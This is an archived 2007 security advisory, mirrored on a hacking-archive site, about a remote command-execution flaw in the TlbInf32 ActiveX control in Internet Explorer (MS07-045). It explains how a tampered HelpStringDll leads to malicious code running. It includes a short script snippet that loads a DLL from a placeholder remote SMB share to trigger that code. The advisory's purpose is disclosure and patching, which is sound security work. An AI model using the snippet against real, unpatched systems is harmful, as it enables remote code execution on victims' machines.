AOH :: HP Unsorted T :: TB12134.HTM

TlbInf32 ActiveX Command Execution



TlbInf32 ActiveX Command Execution
TlbInf32 ActiveX Command Execution



======================================================================== TlbInf32 ActiveX Command Execution
= MS Bulletin posted:   
= http://www.microsoft.com/technet/security/Bulletin/MS07-045.mspx 
= Affected Software:
=      Internet Explorer
=         tlbInf32.dll
=         vstlbinf.dll
= Public disclosure on Wednesday August 15, 2007
=======================================================================
The TypeLib Information object library , implemented in TlbInf32.dll,
is a set of COM objects designed to make type library browsing 
functionality easily accessible to both Visual Basic and C++
programmers.

Although it is not marked as safe for scripting in the registry, it does
implement IObjectSafety.

   Report for Clsid: {8B217746-717D-11CE-AB5B-D41203C10000}
   RegKey Safe for Script: False
   RegKey Safe for Init: False
   Implements IObjectSafety: True
   IDisp Safe:  Safe for untrusted: caller,data


The TypeLibInfoFromFile() function is used to open a file and retrieve
the
typelib information from it.

   TypeLibInfoFromFile(ByVal FileName As String) As TypeLibInfo

This function will accept a webdav/smb share to a DLL file, allowing the
retrieval of information from a DLL hosted on a remote server.

=======================================================================TlbInf32.chm 
  Type libraries can contain help information for the library itself
  (TypeLibInfo object), each TypeInfo (TypeInfo object), and each member
  (MemberInfo object). This information is available in several
different 
  forms.

  HelpString is the documentation string which appears as a short 
  description of the string in object browsers. If the optional LCID 
  (Language/Country identifier) is specified, then the returned string
is
  localized if possible.

  Documentation strings can be stored either in the type library
directly
  or retrieved via a call to the DLLGetDocumentation entry point in the
Dll
  specified by the HelpStringDll property. 
  
  The HelpStringContext is passed to the HelpStringDll to get the
correct
  documentation string for the object. The HelpStringDll and 
  HelpStringContext properties values are used automatically by the 
  HelpString property.
=======================================================================

If the DLL file specified in the call to TypeLibInfoFromFile() has been 
modified to direct the HelpStringDll property to a DLL which exports
a malicious DLLGetDocumentation function, then this function will be 
executed when a request for the HelpString property is made. 

   
   x= test.TypeLibInfoFromFile("\\\\IPADDRESS\\SHARE\\remote.dll")
   ' Call the remote DLLGetDocumentation function
   alert(x.Interfaces.Item(a).Members.Item(b).HelpString)

== Solutions =
Install the vendor supplied patch.
http://www.microsoft.com/technet/security/Bulletin/MS07-045.mspx 

== Credit =
Discovered and advised to Microsoft November 23 2006 by Brett Moore of
Security-Assessment.com

As this is my last advisory release before I leave sa.com and head off 
into the future, I gotta say thanx to the team there, its been a blast
guys. 

All you kiwis overseas have you thought about a trip home.
www.kiwicon.org 

+-SoSD-+

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.